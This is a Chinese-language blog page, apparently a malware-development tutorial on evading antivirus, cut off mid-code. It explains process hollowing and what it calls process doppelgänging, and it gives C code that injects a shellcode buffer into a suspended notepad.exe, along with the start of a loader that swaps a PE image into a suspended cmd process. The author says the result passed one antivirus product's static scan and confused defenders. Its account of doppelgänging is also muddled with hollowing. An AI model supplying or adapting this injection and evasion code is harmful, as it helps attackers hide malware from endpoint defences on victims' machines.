

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言写这个文章呢，主要是写一些免杀中，或者是其他恶意代码开发中，可能会用到的一些手段和手法，因为内容有点偏杂，并且没办法聚合起来形成一个单独的模块，所以就把这些放到一起来讲了。也希望兄弟们，不要嫌弃。 傀儡进程简单介绍傀儡进程（Process Hollowing） 傀儡进程是一种相对较老的技术，其基本思想是创建一个合法的、挂起的进程，然后用恶意代码替换其内存空间，最后恢复进程的执行。 工作原理：">
<meta property="og:type" content="article">
<meta property="og:title" content="《聊聊免杀的那些“把戏”：镂空、伪装和代码藏匿》">
<meta property="og:url" content="http://example.com/2025/10/05/%E3%80%8A%E8%81%8A%E8%81%8A%E5%85%8D%E6%9D%80%E7%9A%84%E9%82%A3%E4%BA%9B%E2%80%9C%E5%B0%8F%E6%8A%8A%E6%88%8F%E2%80%9D%EF%BC%9A%E9%95%82%E7%A9%BA%E3%80%81%E4%BC%AA%E8%A3%85%E5%92%8C%E4%BB%A3%E7%A0%81%E8%97%8F%E5%8C%BF%E3%80%8B/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前言写这个文章呢，主要是写一些免杀中，或者是其他恶意代码开发中，可能会用到的一些手段和手法，因为内容有点偏杂，并且没办法聚合起来形成一个单独的模块，所以就把这些放到一起来讲了。也希望兄弟们，不要嫌弃。 傀儡进程简单介绍傀儡进程（Process Hollowing） 傀儡进程是一种相对较老的技术，其基本思想是创建一个合法的、挂起的进程，然后用恶意代码替换其内存空间，最后恢复进程的执行。 工作原理：">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051631401.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051633805.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051637903.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051706822.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051718089.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051739514.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051757714.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051758905.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051758419.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051812567.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051817241.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051820720.png">
<meta property="og:image" content="c:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20251005185814521.png">
<meta property="og:image" content="c:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20251005185833125.png">
<meta property="article:published_time" content="2025-10-05T08:09:54.000Z">
<meta property="article:modified_time" content="2025-10-05T11:01:32.350Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="杂谈">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051631401.png">
  
  
  
  <title>《聊聊免杀的那些“把戏”：镂空、伪装和代码藏匿》 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>yawataa</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/sun.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="《聊聊免杀的那些“把戏”：镂空、伪装和代码藏匿》"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-05 16:09" pubdate>
          October 5, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.1k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          52 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">《聊聊免杀的那些“把戏”：镂空、伪装和代码藏匿》</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>写这个文章呢，主要是写一些免杀中，或者是其他恶意代码开发中，可能会用到的一些手段和手法，因为内容有点偏杂，并且没办法聚合起来形成一个单独的模块，所以就把这些放到一起来讲了。也希望兄弟们，不要嫌弃。</p>
<h1 id="傀儡进程"><a href="#傀儡进程" class="headerlink" title="傀儡进程"></a>傀儡进程</h1><h2 id="简单介绍"><a href="#简单介绍" class="headerlink" title="简单介绍"></a>简单介绍</h2><p>傀儡进程（Process Hollowing）</p>
<p>傀儡进程是一种相对较老的技术，其基本思想是创建一个合法的、挂起的进程，然后用恶意代码替换其内存空间，最后恢复进程的执行。</p>
<p><strong>工作原理：</strong></p>
<ol>
<li><strong>创建挂起进程：</strong> 恶意软件会创建一个合法的进程（例如 <code>explorer.exe</code> 或 <code>svchost.exe</code>）并使其处于挂起状态。</li>
<li><strong>卸载原有代码：</strong> 使用 <code>NtUnmapViewOfSection</code> 或 <code>ZwUnmapViewOfSection</code> 等API，将合法进程的原始代码段从内存中卸载。</li>
<li><strong>分配新内存：</strong> 在合法进程的内存空间中分配一块新的、可执行的内存区域。</li>
<li><strong>写入恶意代码：</strong> 将恶意代码写入新分配的内存区域。</li>
<li><strong>修改进程上下文：</strong> 修改合法进程的线程上下文（例如 <code>EAX</code> 或 <code>RIP</code> 寄存器），使其指向恶意代码的入口点。</li>
<li><strong>恢复进程：</strong> 恢复合法进程的执行，此时它将执行恶意代码而不是原始代码。</li>
</ol>
<p><strong>特点：</strong></p>
<ul>
<li><strong>内存操作：</strong> 主要通过直接操作进程内存来实现。</li>
<li><strong>API调用：</strong> 涉及 <code>CreateProcess</code> (带 <code>CREATE_SUSPENDED</code> 标志), <code>NtUnmapViewOfSection</code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, <code>ResumeThread</code> 等API。</li>
<li><strong>检测难度：</strong> 相对容易被现代EDR（Endpoint Detection and Response）和AV（Antivirus）检测到，因为内存中会出现可疑的内存区域（例如，一个合法进程的<code>.text</code>段被卸载，然后被替换成其他内容）。</li>
</ul>
<h2 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><code class="hljs objectivec"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;Windows.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> buf[] = <span class="hljs-string">&quot;&quot;</span>;<br><br><span class="hljs-type">BOOL</span> ReplaceProcess(<span class="hljs-keyword">const</span> <span class="hljs-type">char</span>* pszFilePath)<br>&#123;<br>	STARTUPINFO si = &#123; <span class="hljs-number">0</span> &#125;;<br>	PROCESS_INFORMATION pi = &#123; <span class="hljs-number">0</span> &#125;;<br>	CONTEXT threadContext = &#123; <span class="hljs-number">0</span> &#125;;<br>	<span class="hljs-type">BOOL</span> bRet = <span class="hljs-literal">FALSE</span>;<br>	RtlZeroMemory(&amp;si, <span class="hljs-keyword">sizeof</span>(si));<br>	RtlZeroMemory(&amp;pi, <span class="hljs-keyword">sizeof</span>(pi));<br>	RtlZeroMemory(&amp;threadContext, <span class="hljs-keyword">sizeof</span>(threadContext));<br>	si.cb = <span class="hljs-keyword">sizeof</span>(si);<br>	<span class="hljs-comment">// 创建进程并挂起主线程</span><br>	bRet = CreateProcessA(pszFilePath, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">FALSE</span>, CREATE_SUSPENDED, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, &amp;si, &amp;pi);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">FALSE</span> == bRet)<br>	&#123;<br>		printf(<span class="hljs-string">&quot;CreateProcess&quot;</span>);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">FALSE</span>;<br>	&#125;<br>	<span class="hljs-comment">// 在替换的进程中申请一块内存</span><br>	LPVOID lpDestBaseAddr = VirtualAllocEx(pi.hProcess, <span class="hljs-literal">NULL</span>, <span class="hljs-keyword">sizeof</span>(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">NULL</span> == lpDestBaseAddr)<br>	&#123;<br>		printf(<span class="hljs-string">&quot;VirtualAllocEx&quot;</span>);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">FALSE</span>;<br>	&#125;<br>	<span class="hljs-comment">// 写入替换的数据</span><br>	bRet = WriteProcessMemory(pi.hProcess, lpDestBaseAddr, buf, <span class="hljs-keyword">sizeof</span>(buf), <span class="hljs-literal">NULL</span>);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">FALSE</span> == bRet)<br>	&#123;<br>		printf(<span class="hljs-string">&quot;WriteProcessError&quot;</span>);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">FALSE</span>;<br>	&#125;<br>	<span class="hljs-comment">// 获取线程上下文</span><br>	<span class="hljs-comment">// 注意此处标志，一定要写!!!</span><br>	threadContext.ContextFlags = CONTEXT_FULL;<br>	bRet = GetThreadContext(pi.hThread, &amp;threadContext);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">FALSE</span> == bRet)<br>	&#123;<br>		printf(<span class="hljs-string">&quot;GetThreadContext&quot;</span>);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">FALSE</span>;<br>	&#125;<br>	<span class="hljs-comment">// 修改eip从新申请的内存处运行</span><br>	threadContext.Rip = (DWORD64)lpDestBaseAddr;<br>	<span class="hljs-comment">// 设置挂起进程的线程上下文</span><br>	bRet = SetThreadContext(pi.hThread, &amp;threadContext);<br>	<span class="hljs-keyword">if</span> (<span class="hljs-literal">FALSE</span> == bRet)<br>	&#123;<br>		printf(<span class="hljs-string">&quot;SetThreadContext&quot;</span>);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">FALSE</span>;<br>	&#125;<br>	<span class="hljs-comment">// 恢复挂起的进程的线程</span><br>	ResumeThread(pi.hThread);<br>	WaitForSingleObject(pi.hThread, INFINITE);<br>	CloseHandle(pi.hThread);<br>	CloseHandle(pi.hProcess);<br>	<span class="hljs-keyword">return</span> <span class="hljs-literal">TRUE</span>;<br>&#125;<br><br><br><br><span class="hljs-type">void</span> main() &#123;<br><br>	ReplaceProcess(<span class="hljs-string">&quot;C:\\Windows\\System32\\notepad.exe&quot;</span>);<br><br>&#125;<br><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051631401.png" srcset="/img/loading.gif" lazyload alt="image-20251005163100282"></p>
<p>我们可以在Process Hacker中看到进程链条</p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051633805.png" srcset="/img/loading.gif" lazyload alt="image-20251005163302768"></p>
<p>以及有迷惑的样子了，后面还有些手法配合使用，可以迷惑蓝队的排查工作。</p>
<p>看看免杀性</p>
<p><img src="https://cdn.jsdelivr.net/gh/yawataa/image@main/img/202510051637903.png" srcset="/img/loading.gif" lazyload alt="image-20251005163747863"></p>
<p>很简单就过了火绒静态。360和其他就不测试了，开虚拟机比较麻烦，再加上这种手法已经出现了很久了，单一的使用肯定不能免杀。</p>
<h1 id="进程镂空"><a href="#进程镂空" class="headerlink" title="进程镂空"></a>进程镂空</h1><h2 id="简单介绍-1"><a href="#简单介绍-1" class="headerlink" title="简单介绍"></a>简单介绍</h2><p><strong>进程镂空（Process Doppelgänging）</strong></p>
<p>进程镂空是一种较新的技术，它利用了Windows事务性NTFS（Transactional NTFS，TxF）的特性，通过回滚文件事务来避免在磁盘上留下痕迹。</p>
<p>主要思想是卸载合法进程的内存，写入恶意软件的代码，伪装成合法进程进行恶意活动</p>
<p>“在启动过程中添加暂停”。在暂停期间，攻击者可以删除程序可执行文件中的合法代码，并将其替换为恶意代码。这被称为空心化。当启动进程恢复时，它会在继续正常运行之前执行攻击者的代码。从本质上讲，进程挖空允许攻击者将合法的可执行文件转换为看似可信的恶意容器。而且恶意代码还可以从磁盘中删除自身的痕迹以避免被识别，这种策略让反恶意软件很难检测。</p>
<p><strong>工作原理：</strong></p>
<ol>
<li><strong>创建事务：</strong> 恶意软件会使用 <code>CreateTransaction</code> API创建一个NTFS事务。</li>
<li><strong>在事务中修改文件：</strong> 在这个事务中，恶意软件会打开一个合法的可执行文件（例如 <code>explorer.exe</code>），并将其内容替换为恶意代码。</li>
<li><strong>创建进程：</strong> 使用 <code>NtCreateProcessEx</code> 或 <code>CreateProcess</code> (带 <code>CREATE_SUSPENDED</code> 标志) 从这个被修改的文件（但仍在事务中）创建进程。由于进程是在事务中创建的，此时磁盘上的文件实际上并没有被永久修改。</li>
<li><strong>回滚事务：</strong> 在进程创建后，恶意软件会回滚NTFS事务。这意味着磁盘上的文件会恢复到原始状态，仿佛从未被修改过一样。</li>
<li><strong>恢复进程：</strong> 恢复进程的执行，此时它将执行恶意代码。</li>
</ol>
<p><strong>特点：</strong></p>
<ul>
<li><p><strong>利用NTFS事务：</strong> 这是其核心特点，通过事务的回滚来避免在磁盘上留下恶意文件的痕迹。</p>
</li>
<li><p><strong>API调用：</strong> 涉及 <code>CreateTransaction</code>, <code>CreateFileTransacted</code>, <code>NtCreateProcessEx</code> 或 <code>CreateProcess</code> (带 <code>CREATE_SUSPENDED</code> 标志), <code>RollbackTransaction</code> 等API。</p>
</li>
<li><p>检测难度：</p>
<p>比傀儡进程更难检测，因为：</p>
<ul>
<li>磁盘上的文件在进程创建后会恢复原样，文件完整性检查很难发现异常。</li>
<li>进程创建时，文件内容是恶意代码，但由于是在事务中，安全软件可能无法及时捕获到这种瞬时变化。</li>
<li>内存中的进程看起来是一个合法的进程，但其代码实际上是恶意的。</li>
</ul>
</li>
</ul>
<h2 id="代码实现-1"><a href="#代码实现-1" class="headerlink" title="代码实现"></a>代码实现</h2><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-meta">#<span class="hljs-keyword">include</span> &lt;stdio.h&gt;</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> &lt;Windows.h&gt;</span><br><br>typedef <span class="hljs-built_in">NTSTATUS</span>(NTAPI* pNtUnmapViewOfSection)(HANDLE, PVOID);<br><br>int <span class="hljs-built_in">main</span>(int argc, wchar_t* argv[])<br>&#123;<br>	IN PIMAGE_DOS_HEADER pDosHeaders;<br>	IN PIMAGE_NT_HEADERS pNtHeaders;<br>	IN PIMAGE_SECTION_HEADER pSectionHeaders;<br><br>	IN PVOID FileImage;<br><br>	IN HANDLE hFile;<br>	OUT DWORD FileReadSize;<br>	IN DWORD dwFileSize;<br><br>	IN PVOID RemoteImageBase;<br>	IN PVOID RemoteProcessMemory;<br><br><br><br><br>	STARTUPINFOA si = &#123; <span class="hljs-number">0</span> &#125;;<br>	PROCESS_INFORMATION pi = &#123; <span class="hljs-number">0</span> &#125;;<br>	CONTEXT ctx;<br>	ctx.ContextFlags = CONTEXT_FULL;<br>	si.cb = <span class="hljs-built_in">sizeof</span>(si);<br><br><br>	char path[] = <span class="hljs-string">&quot;C:\\HelloWorld.exe&quot;</span>;<br>	<span class="hljs-keyword">BOOL</span> bRet = <span class="hljs-built_in">CreateProcessA</span>(<br>		<span class="hljs-built_in">NULL</span>,<br>		(LPSTR)<span class="hljs-string">&quot;cmd&quot;</span>,<br>		<span class="hljs-built_in">NULL</span>,<br>		<span class="hljs-built_in">NULL</span>,<br>		FALSE,<br>		CREATE_SUSPENDED,<br>		<span class="hljs-built_in">NULL</span>,<br>		<span class="hljs-built_in">NULL</span>,<br>		&amp;si,<br>		&amp;<span class="hljs-built_in">pi</span>);<br><br>	<span class="hljs-comment">//在本进程获取替换文件的内容</span><br>	hFile = <span class="hljs-built_in">CreateFileA</span>(path, GENERIC_READ, FILE_SHARE_READ, <span class="hljs-built_in">NULL</span>, OPEN_EXISTING, <span class="hljs-number">0</span>, <span class="hljs-built_in">NULL</span>);<br>	dwFileSize = <span class="hljs-built_in">GetFileSize</span>(hFile, <span class="hljs-built_in">NULL</span>); <span class="hljs-comment">//获取替换可执行文件的大小</span><br>	FileImage = <span class="hljs-built_in">VirtualAlloc</span>(<span class="hljs-built_in">NULL</span>, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);<br>	<span class="hljs-built_in">ReadFile</span>(hFile, FileImage, dwFileSize, &amp;FileReadSize, <span class="hljs-built_in">NULL</span>);<br>	<span class="hljs-built_in">CloseHandle</span>(hFile);<br><br>	pDosHeaders = (PIMAGE_DOS_HEADER)FileImage;<br>	pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)FileImage + pDosHeaders-&gt;e_lfanew); <span class="hljs-comment">//获取NT头</span><br><br>	<span class="hljs-built_in">GetThreadContext</span>(<span class="hljs-built_in">pi</span>.hThread, &amp;ctx); <span class="hljs-comment">//获取挂起进程上下文</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _WIN64</span><br>	<span class="hljs-built_in">ReadVirtualMemory</span>(<span class="hljs-built_in">pi</span>.hProcess, (PVOID)(ctx.Rdx + (<span class="hljs-built_in">sizeof</span>(SIZE_T) * <span class="hljs-number">2</span>)), &amp;RemoteImageBase, <span class="hljs-built_in">sizeof</span>(PVOID), <span class="hljs-built_in">NULL</span>);<br>	<span class="hljs-comment">// 从rbx寄存器中获取PEB地址，并从PEB中读取可执行映像的基址</span><br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br>	<span class="hljs-comment">// 从ebx寄存器中获取PEB地址，并从PEB中读取可执行映像的基址</span><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _X86_</span><br>	<span class="hljs-built_in">ReadProcessMemory</span>(<span class="hljs-built_in">pi</span>.hProcess, (PVOID)(ctx.Ebx + <span class="hljs-number">8</span>), &amp;RemoteImageBase, <span class="hljs-built_in">sizeof</span>(PVOID), <span class="hljs-built_in">NULL</span>);<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><br>	<span class="hljs-comment">//判断文件预期加载地址是否被占用</span><br>	pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)<span class="hljs-built_in">GetProcAddress</span>(<span class="hljs-built_in">GetModuleHandleA</span>(<span class="hljs-string">&quot;ntdll.dll&quot;</span>), <span class="hljs-string">&quot;NtUnmapViewOfSection&quot;</span>);<br>	<span class="hljs-keyword">if</span> ((SIZE_T)RemoteImageBase == pNtHeaders-&gt;OptionalHeader.ImageBase)<br>	&#123;<br>		<span class="hljs-built_in">NtUnmapViewOfSection</span>(<span class="hljs-built_in">pi</span>.hProcess, RemoteImageBase); <span class="hljs-comment">//卸载已存在文件</span><br>	&#125;<br><br>	<span class="hljs-comment">//为可执行映像分配内存,并写入文件头</span><br>	RemoteProcessMemory = <span class="hljs-built_in">VirtualAllocEx</span>(<span class="hljs-built_in">pi</span>.hProcess, (PVOID)pNtHeaders-&gt;OptionalHeader.ImageBase, pNtHeaders-&gt;OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<br>	<span class="hljs-built_in">WriteProcessMemory</span>(<span class="hljs-built_in">pi</span>.hProcess, RemoteProcessMemory, FileImage, pNtHeaders-&gt;OptionalHeader.SizeOfHeaders, <span class="hljs-built_in">NULL</span>);<br><br>	<span class="hljs-comment">//逐段写入</span><br>	<span class="hljs-keyword">for</span> (int i = <span class="hljs-number">0</span>; i &lt; pNtHeaders-&gt;FileHeader.NumberOfSections; i++)<br>	&#123;<br>		pSectionHeaders = (PIMAGE_SECTION_HEADER)((LPBYTE)FileImage + pDosHeaders-&gt;e_lfanew + <span class="hljs-built_in">sizeof</span>(IMAGE_NT_HEADERS) + (i * <span class="hljs-built_in">sizeof</span>(IMAGE_SECTION_HEADER)));<br>		<span class="hljs-built_in">WriteProcessMemory</span>(<span 